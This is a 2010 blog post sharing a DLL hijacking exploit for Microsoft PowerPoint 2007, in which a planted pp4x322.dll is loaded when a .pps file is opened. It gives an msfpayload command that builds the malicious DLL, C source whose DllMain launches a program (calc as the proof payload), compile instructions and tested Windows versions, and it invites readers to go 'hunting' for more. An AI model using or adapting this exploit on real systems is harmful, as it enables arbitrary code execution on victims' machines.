Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)

25 08 2010

Today is a crazy day with everyone and there mother searching for DLL Hijacking Exploits. They are going quick so get in before they are all gone. 🙂 Bellow is a exploit I found for .pps files in MS Power Point 2007. Power Point looks for pp4x322.dll and loads it. This will not work with real .pps but will work with a text file if extension is changed to a .pps instead of .txt. I have tested it on Windows 7 64bit and it works. Rapid 7 has a great article on DLL Hijacking and it is a must read.

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

msfpayload windows/exec CMD=calc.exe D > pp4x322.dll
or
/*

Exploit Title: Microsoft Windows Power Point 2007 DLL Hijacking Exploit (pp4x322.dll)
Date: August 25, 2010
Author: monstream00 (monstream00 [at} hotmail.com)
Modified storm's exploit for pp4x322.dll and used Rapid7 write up to find. Happy hunting.
Rapid7 write up: http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html
Tested on: Windows 7 64bit, XP SP3 with MS Office PowerPoint 2007 SP2 MSO 12.0.6535.5002

https://monstream00.wordpress.com/

gcc -shared -o pp4x322.dll powerpoint2007-DLL.c
.pps file affected. */ #include windows.h int hax() { WinExec("calc", 0); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { hax(); return 0; }

Also see corelan for a unofficial list of DLL Hijacking Exploits.
http://www.corelan.be:8800/index.php/2010/08/25/dll-hijacking-kb-2269637-the-unofficial-list/

Advertisements

Actions

Information

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s




%d bloggers like this: